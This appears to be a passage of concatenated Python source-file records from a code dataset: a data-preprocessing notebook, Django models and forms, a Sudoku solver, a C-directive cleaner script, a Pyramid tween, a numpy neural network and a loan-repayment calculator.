#The first column is labeled with an integer, 0. Replace with 'diagnosis'\n new_names = list(df.columns)\n new_names[0] = \"diagnosis\"\n df.columns = new_names\n \n ecog_columns = [column for column in df.columns if column.startswith(\"Ecog\")]\n \n \n df = df.drop(ecog_columns, axis=1)\n \n if columns_to_drop is not None:\n df = df.drop(columns_to_drop, axis=1)\n\n if verbose:\n print(df.shape)\n print(\"Row analysis of NaNs\")\n with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also\n print(df.isna().sum(axis=0))\n\n df = df.dropna(axis=0, how=\"all\")\n if verbose:\n print(df.isna().sum(axis=0))\n print(df.shape)\n print(\"Column analysis of NaNs\")\n print(df.isna().sum(axis=1))\n\n df = df.dropna(axis=1, how=\"all\")\n if verbose:\n print(df.isna().sum(axis=1))\n print(df.shape)\n\n df = df.dropna(axis=0, how=\"any\")\n if verbose:\n print(df.isna().sum().sum())\n print(df.shape)\n\n \"\"\"\n targets = df[[target_column]]\n if target_column == \"DX\":\n targets = targets[\"DX\"].apply(convert_string_to_integer_diagnosis)\n \"\"\"\n \n\n #features = df.drop(target_column, axis=1)\n\n return df \n\nfeatures = get_data_for_experiment_with_modalities(modalities_to_use, None, None, data, drop, verbose=True)\n\n# Lengths obtained by reading each modality in individually and removing the necessary columns\n# # +\ndiagnosis_latest_LEN = 1\nsnp_labeled_LEN = 1224\nMRI_FSX_SV_labeled_latest_LEN = 44\nMRI_FSX_CV_labeled_latest_LEN = 71\nMRI_FSX_SA_labeled_latest_LEN = 72\nMRI_FSX_TA_labeled_latest_LEN = 70\nMRI_FSX_TS_labeled_latest_LEN = 70\nMRI_FSL_SV_labeled_latest_LEN = 44\nMRI_FSL_CV_labeled_latest_LEN = 71\nMRI_FSL_SA_labeled_latest_LEN = 72\nMRI_FSL_TA_labeled_latest_LEN = 70\nMRI_FSL_TS_labeled_latest_LEN = 70\n\nfeatures.to_csv(\"../out/tadpole_dx_snp_fsx_fsl_latest.csv\")\nprint(\"Wrote results to ../out/tadpole_dx_snp_fsx_fsl_latest.csv\")\n","sub_path":"alz/notebooks/tadpolelatest.py","file_name":"tadpolelatest.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514510713","text":"from django.db import models\n\n# Create your models here.\nfrom Product.models import Product\nfrom User.models import User\n\n\nclass ApiTest(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE, verbose_name='产品', null=True)\n api_test_name = models.CharField(max_length=64, null=False, blank=False, verbose_name='流程接口名')\n api_test_desc = models.CharField(max_length=64, null=False, blank=False, verbose_name='描述')\n api_tester = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='执行人')\n api_test_res = models.BooleanField(verbose_name='测试结果')\n create_time = models.DateTimeField(auto_now=True, verbose_name='创建时间')\n\n def __str__(self):\n return self.api_test_name\n\n class Meta:\n db_table = 'ApiTest'\n verbose_name = '用例'\n verbose_name_plural = verbose_name\n\n\nREQUEST_METHOD = (('get', 'get'), ('post', 'post'), ('put', 'put'), ('delete',\n 'delete'),\n ('patch', 'patch'))\n\n\nclass ApiTestStep(models.Model):\n api_name = models.CharField(max_length=100, null=False, blank=False, verbose_name='用例名称')\n api_url = models.CharField(max_length=200, null=False, blank=False, verbose_name='接口URL')\n api_step = models.CharField(max_length=100, null=True, verbose_name='测试步骤')\n api_param_val = models.CharField(max_length=800, null=False, blank=False, verbose_name='请求参数与值')\n api_method = models.CharField(max_length=200, null=True, verbose_name='接口方法', default='get',\n choices=REQUEST_METHOD)\n api_result = models.CharField(max_length=200, null=False, blank=False, verbose_name='接口预期结果')\n api_response = models.CharField(max_length=5000, null=True, blank=True, verbose_name='响应数据')\n api_status = models.BooleanField(verbose_name='是否通过')\n create_time = models.DateTimeField(auto_now=True, verbose_name='创建时间')\n\n api_test = models.ForeignKey(ApiTest, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.api_name\n\n class Meta:\n db_table = 'ApiTestStep'\n verbose_name = '用例方法'\n verbose_name_plural = verbose_name\n\n\n\n\nclass Apis(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE, null=True, verbose_name='产品')\n api_name = models.CharField(max_length=100, verbose_name='接口名称')\n api_url = models.CharField(max_length=200, verbose_name='url地址')\n api_par_val = models.CharField(max_length=800, verbose_name='请求参数和值')\n api_method = models.CharField(choices=REQUEST_METHOD, default='get', max_length=200, verbose_name='请求参数')\n api_result = models.CharField(max_length=200, verbose_name='预期结果')\n api_status = models.BooleanField(verbose_name='是否通过')\n create_time = models.DateTimeField(auto_now=True, verbose_name='创建时间')\n\n def __str__(self):\n return self.api_name\n\n class Meta:\n db_table = 'Apis'\n verbose_name = '单一场景接口'\n verbose_name_plural = verbose_name","sub_path":"Pro_Api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496336399","text":"# General Sedoku Direct Solver\n# By Peter Zenger\n# April 1, 20\n\nfrom __future__ import print_function\nfrom copy import deepcopy\nimport os, sys, math, inspect\n\nm = 0\nn = 0\nnumbers = []\n\n\nclass Value():\n \"\"\"\n A Value in a square\n Stores its value, possible values location,\n and whether it has been propagted or not\n \"\"\"\n\n def __init__(self, value):\n self.possible_values = []\n self.value = int(value)\n\n def remove_value(self, value):\n \"\"\" Removes a value from the set of possible_values \"\"\"\n if int(value) in self.possible_values:\n self.possible_values.remove(int(value))\n return True\n return False\n\n def set_value(self, value=-1):\n \"\"\" Sets the value and flags Value to have been propagated \"\"\"\n if value == -1:\n self.value = self.possible_values[0]\n else:\n self.value = int(value)\n self.possible_values = [self.value] # added\n\n if (self.row, self.column) in possibility_list:\n possibility_list.remove((self.row, self.column))\n\n def setup(self, row, column):\n \"\"\"\n Compute location of this Value\n Update the possible_values\n \"\"\"\n self.row = row\n self.column = column\n self.square = compute_square(row, column)\n if self.value > 0:\n self.possible_values = [self.value]\n return True\n else:\n self.possible_values = numbers[:]\n return False\n\n\ndef init_board(name):\n \"\"\"\n Loads a board which is defined by an NxN grid in a file\n The board can be formated 'DDDD' or 'D D D D D'\n The board must be of the size M^2 by M^2\n \"\"\"\n try:\n f = open(os.path.normpath('../boards/' + name), 'r')\n data = f.readlines()\n f.close()\n\n board_2d = []\n formatting = True\n if ' ' in data[0]:\n formatting = False\n\n for line in data:\n new_row = []\n\n if formatting:\n for x in line.strip():\n new_row.append(Value(x))\n else:\n for x in line.strip().split(' '):\n new_row.append(Value(x))\n\n board_2d.append(new_row)\n\n global numbers, m, n\n\n n = len(board_2d[0]) # Size of each side of the square\n m = int(math.sqrt(n)) # Size of each subsquare\n numbers = range(1, n + 1) # Possible values for a square to have\n\n # Setup each square of the board\n for row in range(n):\n for col in range(n):\n if board_2d[row][col].setup(row, col):\n to_visit.append(board_2d[row][col])\n possibility_list.append((row, col))\n return board_2d\n\n except IOError:\n print(os.path.normpath('../boards/' + name))\n print(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))))\n print(\"Error opening '%s', check spelling and try again\" % name)\n sys.exit(-1)\n\n\ndef compute_square(row, column):\n \"\"\"Computes which sub-square number the square resides in\"\"\"\n\n square_number = int(row / m) * (n / m) + int(column / m)\n return square_number\n\n\ndef stringify_board(board):\n \"\"\" Turn the board into a string for outputting \"\"\"\n\n output = []\n for line in board:\n tmp = []\n for item in line:\n tmp.append(str(item.value))\n tmp.append(' ')\n tmp.append('\\n')\n output.append(tmp)\n\n return ''.join(str(item) for line in output for item in line)\n\n\ndef propagate(value):\n \"\"\" Removes possible values from each intersecting square \"\"\"\n # Value is object\n\n remove_rows(value.value, value.row)\n remove_columns(value.value, value.column)\n remove_square(value.value, value.square)\n\n return\n\n# Do something to only grab unfilled values\ndef remove_rows(value, row):\n return [board[row][col].remove_value(value) for col in xrange(n)]\n\n\ndef remove_columns(value, col):\n return [board[row][col].remove_value(value) for row in xrange(n)]\n\n\ndef remove_square(value, square):\n row = int(square / m) * m\n col = (square % m) * m\n if n <= 2:\n return\n return [board[row + i][col + j].remove_value(value) for i in range(0, m) for j in range(0, m)]\n\n\ndef get_lowest_possibility():\n \"\"\" Returns the square that has the least number of possibilities\"\"\"\n low = 10000\n low_item = None\n for r, c in possibility_list:\n if len(board[r][c].possible_values) < low:\n low = len(board[r][c].possible_values)\n low_item = board[r][c]\n\n if low_item:\n #possibility_list.remove(low_item)\n return [low_item]\n else:\n return None\n\n\ndef timeout(start):\n # Timeout at 15 minutes\n if time.time() - (15*60) > start:\n return True\n return False\n\ndef main():\n if len(sys.argv) < 2 or len(sys.argv) > 3:\n print(\"Peter Zenger's Sedoku solver program\")\n print(\"Usage: %s [INPUT FILE]\" % sys.argv[0])\n sys.exit(-1)\n\n input_board = sys.argv[1]\n\n global board, to_visit, possibility_list\n contradiction = False\n to_visit = [] # List of nodes to propagate\n\n possibility_list = []\n\n board = init_board(input_board)\n\n branch_boards = []\n\n solved = False\n start_time = time.time()\n while not contradiction and not solved and not timeout(start_time):\n if to_visit:\n for item in to_visit:\n if len(item.possible_values) == 0:\n contradiction = True\n elif len(item.possible_values) == 1:\n item.set_value()\n propagate(item)\n else:\n\n # Save each branch except the first\n for v in item.possible_values[1:]:\n # Deepcopying both is diverging board and possibility_list values\n branch_boards.append(\n (deepcopy(board),\n possibility_list[:],\n deepcopy(item),\n v)\n )\n\n # Explore first branch\n item.set_value(item.possible_values[0])\n propagate(item)\n\n to_visit = get_lowest_possibility()\n\n if contradiction and len(branch_boards) > 0:\n # If there are unexplored branches, explore them\n board, possibility_list, next_value, value = branch_boards.pop()\n\n #print(\"Branching: %d unexplored %d\" % (len(branch_boards), len(possibility_list)))\n\n board[next_value.row][next_value.column].set_value(value)\n to_visit = [board[next_value.row][next_value.column]]\n\n contradiction = False\n\n # If the # of filled squares equals the total squares, the puzzle is solved\n if len(possibility_list) == 0:#filled_count >= total_count:\n solved = True\n\n if contradiction:\n print(\"!!! UNSATISFIABLE !!!\")\n elif timeout(start_time):\n print(\"/// TIMEOUT AFTER 15 MINUTES ///\")\n else:\n print(\"~~~SUCCESS~~~\")\n #output_board = stringify_board(board)\n\n #print(output_board)\n\n\nif __name__ == \"__main__\":\n import time\n\n time1 = time.time()\n main()\n time2 = time.time()\n print(time2 - time1)\n","sub_path":"direct/solver_3.py","file_name":"solver_3.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183618182","text":"#!/usr/bin/env python3\n\"\"\"\nClean C/C++ source files from unnecessary preprocessor directives.\nPath to working makefile is required.\n\nAuthor : bind3v\n\"\"\"\n\nimport sys\nimport os\nimport subprocess\nimport glob\nfrom argparse import ArgumentParser\n\n\ndef find_make(path):\n make = False\n if not os.path.exists(path):\n print(\"{} doesn't exists\".format(path))\n sys.exit(1)\n for file in os.listdir(path):\n if file.lower() == 'makefile':\n make = True\n break\n return make\n\n\ndef parse_cli():\n parser = ArgumentParser(description='Source files cleaner')\n parser.add_argument('--path', nargs=1, action='store',\n help='Path to project files')\n parser.add_argument('--make', nargs=1, action='store',\n help='Add make option (default: make all)')\n parser.add_argument('--list', action='store_true',\n help='List only')\n parser.add_argument('--rm', action='store_true',\n help='Remove unnecessary directives')\n return parser.parse_args()\n\n\ndef run_make(cmd):\n make = subprocess.Popen(cmd, shell=True,\n stdout=subprocess.PIPE,\n stderr=sys.stdout.fileno())\n while True:\n line = make.stdout.readline()\n if not line:\n break\n print(line)\n sys.stdout.flush()\n\n\ndef parse_hdr(cmd, mode='list'):\n files = glob.glob('**/*.*', recursive=True)\n cfiles = [cf for cf in files if\n cf.endswith(\".c\") or\n cf.endswith(\".h\") or\n cf.endswith(\".cpp\")]\n print(cfiles)\n\n\ndef main():\n args = parse_cli()\n path = ''\n if args.path:\n found = find_make(args.path[0])\n if found:\n path = os.path.abspath(args.path[0])\n else:\n found = find_make('.')\n if not found:\n print(\"Makefile doesn't exists.\")\n sys.exit(1)\n if path:\n os.chdir(path)\n cmd = 'make'\n if args.make:\n cmd = ' '.join([cmd, args.make[0]])\n if args.list:\n parse_hdr(cmd)\n if args.rm:\n parse_hdr(cmd, mode='rm')\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"97959102","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom json import JSONEncoder\n\nfrom pyramid_hypernova.batch import BatchRequest\nfrom pyramid_hypernova.plugins import PluginController\nfrom pyramid_hypernova.token_replacement import hypernova_token_replacement\n\n\ndef hypernova_tween_factory(handler, registry):\n registry = registry\n\n def hypernova_tween(request):\n request.hypernova_batch = configure_hypernova_batch(registry, request)\n\n response = handler(request)\n\n if not request.hypernova_batch.jobs:\n return response\n\n try:\n # Skip token replacement logic if explicitly flagged to\n if request.disable_hypernova_tween:\n return response\n except AttributeError:\n pass\n\n with hypernova_token_replacement(request.hypernova_batch) as body:\n body['content'] = response.text\n\n response.text = body['content']\n\n return response\n\n return hypernova_tween\n\n\ndef configure_hypernova_batch(registry, request):\n get_job_group_url = registry.settings['pyramid_hypernova.get_job_group_url']\n\n plugins = registry.settings.get('pyramid_hypernova.plugins', [])\n plugin_controller = PluginController(plugins)\n\n batch_request_factory = registry.settings.get(\n 'pyramid_hypernova.batch_request_factory',\n BatchRequest,\n )\n\n json_encoder = registry.settings.get('pyramid_hypernova.json_encoder', JSONEncoder())\n\n return batch_request_factory(\n get_job_group_url=get_job_group_url,\n plugin_controller=plugin_controller,\n json_encoder=json_encoder,\n pyramid_request=request,\n )\n","sub_path":"pyramid_hypernova/tweens.py","file_name":"tweens.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382611547","text":"from django import forms\nfrom .models import Sinppet\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout,Submit\n\n\nclass NameWidget(forms.MultiWidget):\n\n def __init__(self,attrs=None):\n super().__init__([\n forms.TextInput(),\n forms.TextInput()\n ],attrs)\n\n def decompress(self,value):\n if value:\n return value.split('')\n return ['','']\n\nclass NameField(forms.MultiValueField):\n\n widget = NameWidget\n def __init__(self,*args,**kwargs):\n\n fields = (\n forms.CharField(),\n forms.CharField(),\n )\n\n super().__init__(fields,*args,**kwargs)\n\n def compress(self,data_list):\n return f'{data_list[0]} {data_list[1]}'\n\nclass ContactForm(forms.Form):\n #name = forms.CharField()\n # Multivalue field Example\n name = NameField()\n email = forms.CharField(label='E-mail')\n category= forms.ChoiceField(choices=[('question','Question'),('other','Other')])\n subject = forms.CharField(required=False)\n body = forms.CharField(widget=forms.Textarea)\n\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.helper = FormHelper\n self.helper.form_method = 'post'\n\n #Adding Submit Button\n self.helper.layout = Layout(\n 'name',\n 'email',\n 'category',\n 'subject',\n 'body',\n Submit('submit','Submit',css_class='btn-success')\n \n )\n\n\nclass SnipperForm(forms.ModelForm):\n\n class Meta:\n model = Sinppet\n fields = ('name','body')","sub_path":"django_forms_multivalue/myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467285154","text":"import numpy as np\n\ndef nonlin(x,deriv=False):\n if(deriv==True):\n return x*(1-x)\n # print(str(x) + \" \" + str(1/(1+np.exp(-x))))\n return 1/(1+np.exp(-x))\n\nclass NeuralNetwork():\n def __init__(self):\n self.X = np.empty\n self.Y = np.empty\n self.Xtest = np.empty\n self.Ytest = np.empty\n self.results = np.empty\n np.random.seed(1)\n # np.seterr(over='raise')\n self.syn0 = 0.5*np.random.random((136*2,500)) - 0.25\n self.syn1 = 0.5*np.random.random((500,1)) - 0.25\n self.firstInput = True\n self.firstTestInput = True\n\n def load_test_match(self, training_data):\n if(self.firstTestInput):\n self.Xtest = np.array([training_data[0:136*2:1]])\n self.Ytest = np.array([[training_data[136*2]]])\n self.results = self.Ytest\n self.firstTestInput = False\n else:\n self.Xtest = np.append(self.Xtest, [training_data[0:136*2:1]], axis=0)\n self.Ytest = np.append(self.Ytest, [[training_data[136*2]]], axis=0)\n self.results = self.Ytest\n\n def clear_test_match(self, training_data):\n self.Xtest = np.empty\n self.Ytest = np.empty\n self.results = np.empty\n self.firstTestInput = True\n\n def test(self):\n l0 = self.Xtest\n l1 = nonlin(np.dot(l0,self.syn0))\n l2 = nonlin(np.dot(l1,self.syn1))\n\n l2_error = self.Ytest - l2\n self.results = l2_error\n\n # for i in range(self.Ytest.size):\n # print(\"expected: \" + str(self.Ytest[i][0]) + \" got \" + str(l2[i][0]) + \" dif \" + str(\"{0:.5f}\".format(l2_error[i][0])))\n \n mse = (l2_error ** 2).mean(axis=0)\n print(\"test mse: \" + str(\"{0:.5f}\".format(mse[0])))\n return self.results\n\n def load_one_match(self, training_data):\n if(self.firstInput):\n self.X = np.array([training_data[0:136*2:1]])\n self.Y = np.array([[training_data[136*2]]])\n self.firstInput = False\n else:\n self.X = np.append(self.X, [training_data[0:136*2:1]], axis=0)\n self.Y = np.append(self.Y, [[training_data[136*2]]], axis=0)\n \n def train_times(self, n):\n for j in range(n):\n l0 = self.X\n l1 = nonlin(np.dot(l0,self.syn0))\n l2 = nonlin(np.dot(l1,self.syn1))\n\n l2_error = self.Y - l2\n\n if (j%1 == 0):\n mse = (l2_error ** 2).mean(axis=0)\n # for i in range(self.Y.size):\n # print(\"expected: \" + str(self.Y[i][0]) + \" got \" + str(l2[i][0]) + \" dif \" + str(\"{0:.5f}\".format(l2_error[i][0])))\n print(\"All champs mse: \" + str(\"{0:.5f}\".format(mse[0])))\n # print(\"Error:\" + str(np.abs(l2_error)))\n \n l2_delta = l2_error*nonlin(l2,deriv=True)\n\n l1_error = l2_delta.dot(self.syn1.T)\n\n l1_delta = l1_error*nonlin(l1,deriv=True)\n\n self.syn1 += 0.0003*l1.T.dot(l2_delta)\n self.syn0 += 0.0003*l0.T.dot(l1_delta)","sub_path":"src/neuralnetwork/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552356702","text":"import pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport csv\n\ndef calcLivingExpenses(csvFile):\n with open(csvFile, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n i = 0\n for row in reader:\n i+=1\n groceriesAnalysis = pd.DataFrame(index=range(i),\n columns=['Item', 'StandardOrderQty', 'UnitPrice', 'UnitServings', 'ServingSize',\n 'ServingMetric', 'CaloriesPerServing', 'Carbs', 'Sugar', 'Fiber',\n 'Fat', 'Protein', 'ServingsConsumedPerDay', 'DaysUntilDepletion',\n '%CoverageWithinMonth', 'EstimatedMonthlyExpense'])\n i = 0\n for row in reader:\n print(row['Item'], row['NumUnits'], row['UnitPrice'], row['UnitServings'], row['ServingSize'])\n groceriesAnalysis.at[i, 'Item'] = row['Item']\n groceriesAnalysis.at[i, 'StandardOrderQty'] = row['NumUnits']\n groceriesAnalysis.at[i, 'UnitPrice'] = row['UnitPrice']\n groceriesAnalysis.at[i, 'UnitServings'] = row['UnitServings']\n groceriesAnalysis.at[i, 'ServingSize'] = row['ServingSize']\n groceriesAnalysis.at[i, 'ServingMetric'] = row['ServingMetric']\n groceriesAnalysis.at[i, 'CaloriesPerServing'] = row['Calories']\n groceriesAnalysis.at[i, 'Carbs'] = row['Carbs']\n groceriesAnalysis.at[i, 'Sugar'] = row['Sugar']\n groceriesAnalysis.at[i, 'Fiber'] = row['Fiber']\n groceriesAnalysis.at[i, 'Fat'] = row['Fat']\n groceriesAnalysis.at[i, 'Protein'] = row['Protein']\n groceriesAnalysis.at[i, 'ServingsConsumedPerDay'] = row['ServingsConsumedPerDay']\n daysUntilDepletion = row['NumUnits'] * round(1/(row['ServingsConsumedPerDay'] / row['UnitServings']), 3)\n groceriesAnalysis.at[i, 'DaysUntilDepletion'] = daysUntilDepletion\n coverageWithinMonth = round((daysUntilDepletion / 30.458), 3)\n groceriesAnalysis.at[i, '%CoverageWithinMonth'] = round(100 * coverageWithinMonth, 3)\n estimatedMonthlyExpense = round(row['UnitPrice'] * row['NumUnits'] * (1 / coverageWithinMonth), 3)\n groceriesAnalysis.at[i, 'EstimatedMonthlyExpense'] = estimatedMonthlyExpense\n i+=1\n return groceriesAnalysis\n\ndef defineLoanTerms(borrowedAmount, apr, duration):\n\n loanAnalysis = pd.DataFrame(index=range(duration*12),\n columns=['Year','Month','BoP_AccruedInterest', 'BoP_Principal', 'BoP_Balance', 'Payment',\n 'EoP_AmtAppliedTowardInterest', 'EoP_AmtAppliedTowardPrincipal', 'EoP_Balance',\n 'APR','Duration'])\n\n for i in range(0,len(loanAnalysis)):\n loanAnalysis.at[i, 'Month'] = i\n loanAnalysis.at[i, 'APR'] = apr\n loanAnalysis.at[i, 'Duration'] = duration\n #We assume the loan is DISBURSED ON THE 1st DAY OF THE 1st MONTH\n #We assume that starting in the very 1st month, INTEREST ACCRUES DAILY\n #We assume that the very 1st PAYMENT OCCURS ON 1st DAY OF THE 2nd MONTH\n loanAnalysis.at[0,'BoP_AccruedInterest'] = 0\n loanAnalysis.at[0,'BoP_Principal'] = borrowedAmount\n loanAnalysis.at[0,'BoP_Balance'] = borrowedAmount\n loanAnalysis.at[0,'Payment'] = 0\n loanAnalysis.at[0,'EoP_AmtAppliedTowardInterest'] = 0\n loanAnalysis.at[0,'EoP_AmtAppliedTowardPrincipal'] = 0\n\n dailyInterestRate = ((apr/100)/365)\n accruedInterest = 30 * (dailyInterestRate * loanAnalysis.at[0,'BoP_Balance'])\n loanAnalysis.at[0,'EoP_Balance'] = round(accruedInterest + loanAnalysis.at[0,'BoP_Balance'],2)\n\n loanAnalysis.at[1,'BoP_AccruedInterest'] = round(accruedInterest,2)\n loanAnalysis.at[1,'BoP_Principal'] = borrowedAmount\n loanAnalysis.at[1,'BoP_Balance'] = loanAnalysis.at[0,'EoP_Balance']\n\n return loanAnalysis\n\ndef processLoanPayment(loanInformation, currentPeriod, payment):\n\n loanDataFrame = loanInformation\n duration = loanDataFrame.at[0,'Duration']\n\n currentAccruedInterest = loanDataFrame.at[currentPeriod,'BoP_AccruedInterest']\n currentPrincipalBalance = loanDataFrame.at[currentPeriod,'BoP_Principal']\n currentTotalBalance = loanDataFrame.at[currentPeriod,'BoP_Balance']\n\n loanDataFrame.at[currentPeriod,'Payment'] = payment\n\n if(payment >= currentAccruedInterest): #We need this condition because at the very least, we must pay interest\n loanDataFrame.at[currentPeriod,'EoP_AmtAppliedTowardInterest'] = currentAccruedInterest\n loanDataFrame.at[currentPeriod,'EoP_AmtAppliedTowardPrincipal'] = payment - currentAccruedInterest\n loanDataFrame.at[currentPeriod,'EoP_Balance'] = currentTotalBalance - payment\n\n #testCondition = loanDataFrame.at[currentPeriod,'EoP_Balance']\n #print(testCondition)\n if(loanDataFrame.at[currentPeriod,'EoP_Balance'] <= 0.00):\n print(\"The loan has been fully serviced! Any excess payments will be remitted.\")\n return (True, loanInformation, currentPeriod)\n else:\n apr = loanDataFrame.at[0, 'APR']\n dailyInterestRate = ((apr/100)/365)\n accruedInterest = 30 * (dailyInterestRate * loanDataFrame.at[currentPeriod,'EoP_Balance'])\n\n whichPeriodToResume = (currentPeriod + 1)\n loanDataFrame.at[whichPeriodToResume, 'BoP_AccruedInterest'] = round(accruedInterest,2)\n loanDataFrame.at[whichPeriodToResume, 'BoP_Principal'] = round(loanDataFrame.at[currentPeriod,'EoP_Balance'],2)\n loanDataFrame.at[whichPeriodToResume, 'BoP_Balance'] = round(accruedInterest + loanDataFrame.at[whichPeriodToResume, 'BoP_Principal'],2)\n\n return (False, loanInformation, whichPeriodToResume)\n\ndef verifyOutstandingDebt(debtInformation, monthlyDebtPayment, dateOfPayment = 1):\n\n for i in range(0, 12):\n #print(\"Month #\",i)\n remainingDebt = processLoanPayment(debtInformation, dateOfPayment, monthlyDebtPayment)\n if (remainingDebt[0] is True):\n debtHasBeenServiced = True\n studentLoans = remainingDebt[1]\n dateOfPayment = remainingDebt[2]\n break\n else:\n debtHasBeenServiced = False\n studentLoans = remainingDebt[1]\n dateOfPayment = remainingDebt[2]\n\n #print(remainingDebt[1])\n return (debtHasBeenServiced, studentLoans, dateOfPayment)\n\ndef calcRequiredMonthlyPayment(debtPrincipal, debtIR, debtDuration, desiredDuration, preallocation):\n debtIR = (debtIR/100)\n expectedMonthlyPayment = (debtPrincipal * (debtIR / 12)) / (1 - ((1 + (debtIR / 12)) ** (-12 * debtDuration)))\n expectedMonthlyPayment = round(expectedMonthlyPayment, 2)\n\n capableTerm = -((math.log((-(((debtPrincipal*debtIR)/preallocation)-12))/12)) / (12 * math.log((12+debtIR)/12)))\n capableTerm = round(capableTerm, 2)\n minTime = capableTerm\n\n print(\"\\nREQUIRED Monthly payment is: $\", expectedMonthlyPayment)\n print(\"PLANNED Monthly payment is: $\", preallocation)\n\n timeReduction = round(100*((capableTerm - debtDuration)/debtDuration),2)\n temp = ''\n if(timeReduction > 0):\n temp = 'EXTENDED'\n else:\n temp = 'REDUCED'\n timeReduction = math.fabs(timeReduction)\n paymentRatio = round(100*preallocation/expectedMonthlyPayment,2)\n print(\"With a planned payment of $\",preallocation,\"(\",paymentRatio,\"% of required payment), \"\n \"the time required would be\",temp,\"by\", timeReduction,\"%\")\n\n neededPaymentToMeetTimeGoal = (debtPrincipal * (debtIR / 12)) / (1 - ((1 + (debtIR / 12)) ** (-12 * desiredDuration)))\n neededPaymentToMeetTimeGoal = round(neededPaymentToMeetTimeGoal,2)\n neededTimeReductionFromStatedTerm = round(math.fabs(100*(1-(1/(debtDuration/desiredDuration)))), 2)\n\n print(\"In order to service the debt within a desired time constraint of\",desiredDuration,\"years, the MINIMUM \"\n \"required monthly payment\\nwould have to be $\",neededPaymentToMeetTimeGoal,\". This would yield a\",\n neededTimeReductionFromStatedTerm, \"% time reduction from the stated\",debtDuration,\"year term of the debt.\\n\")\n\n x = []\n y = []\n preallocation = expectedMonthlyPayment\n for q in range(0,900):\n paymentRatio = round(100*preallocation/expectedMonthlyPayment,2)\n capableTerm = -((math.log((-(((debtPrincipal * debtIR) / preallocation) - 12)) / 12)) / (\n 12 * math.log((12 + debtIR) / 12)))\n capableTerm = round(capableTerm, 2)\n timeReduction = math.fabs( round(100 * ((capableTerm - debtDuration) / debtDuration), 2) )\n\n x.append(paymentRatio)\n y.append(timeReduction)\n preallocation += 10.0\n\n fig = plt.figure()\n fig.suptitle('Nonlinear Effect of Repayment Magnitude on Service Duration', fontsize=14)\n ax1 = fig.add_subplot(111)\n ax1.grid(True)\n ax1.scatter(x,y)\n ax1.set_ylim(0,108)\n ax1.set_title('DebtTerm = '+str(debtDuration)+\" years @ \"+str(debtIR*100)+\"% IR\")\n ax1.set_ylabel('% Time Reduction in Payoff')\n ax1.set_xlabel('Payment Ratio = (PlannedPMT / RequiredPMT)')\n # for i,j in zip(x,y):\n # ax1.annotate(str(j), xy=(i,j))\n\n #plt.show()\n return expectedMonthlyPayment, neededPaymentToMeetTimeGoal, minTime\n\ndef calcAsFractionOfMonthlyIncome(disposableIncome, monthlyAllocationFigure):\n biweeklyPay = round(disposableIncome / 26, 2)\n neededProportionOfMonthlyIncome = round(100*(monthlyAllocationFigure / (2 * biweeklyPay)),2)\n\n print(\"A monthly payment of $\", monthlyAllocationFigure, \"would entail a\",\n neededProportionOfMonthlyIncome, \"% allocation of the BASELINE year's monthly income.\\n\")\n return neededProportionOfMonthlyIncome\n\ndef simulatePostGradLife(startingIncome, annualRaiseRate, scope, debtBurden, presetIncomeAllocations, incrementalIncomeFreedom,\n proportionalRepayment):\n earnedIncome = startingIncome\n allocationForCHECKING = presetIncomeAllocations[0]\n allocationForLOANS = presetIncomeAllocations[1]\n allocationForINVESTMENTS = presetIncomeAllocations[2]\n splitTowardCHECKING = incrementalIncomeFreedom[0]\n splitTowardINVESTING = incrementalIncomeFreedom[1]\n\n if(proportionalRepayment is True):\n schoolLoansAreRepaidAsFixedProportionOfIncome = True\n elif(proportionalRepayment is False):\n schoolLoansAreRepaidAsFixedProportionOfIncome = False\n taxRate = 25.0 # percent tax incidence\n startingBoP = 2020\n studentLoans = debtBurden\n debtHasBeenServiced = False\n\n simulationOutput = pd.DataFrame(index=range(scope),\n columns=['Year', 'DisposableIncome', 'BiweeklyPay',\n '%Contrib_CHECKING',\n '$Contrib_CHECKING', # MONTHLY ALLOWANCE FOR CHECKING\n '%Contrib_SCHOOL_LOANS',\n '$Contrib_SCHOOL_LOANS', # MONTHLY LOAN PAYMENT\n '%Contrib_CARPAY',\n '$Contrib_CARPAY',\n '%Contrib_INVEST',\n '$Contrib_INVEST',\n 'SavedThusFar',\n 'HoldingsAfterROI',\n 'sumToOneCHECK'])\n\n #schoolLoansAreRepaidAsFixedProportionOfIncome = False\n for x in range(0, scope):\n print(\"BEGINNING Year #\", x)\n simulationOutput.at[x, 'Year'] = (startingBoP + x)\n if (x is 0):\n simulationOutput.at[x, 'DisposableIncome'] = round(earnedIncome * (1 - (taxRate / 100)), 2)\n simulationOutput.at[x, 'BiweeklyPay'] = round(simulationOutput.at[x, 'DisposableIncome'] / 26, 2)\n\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = allocationForLOANS\n\n monthlyLoanPayment = 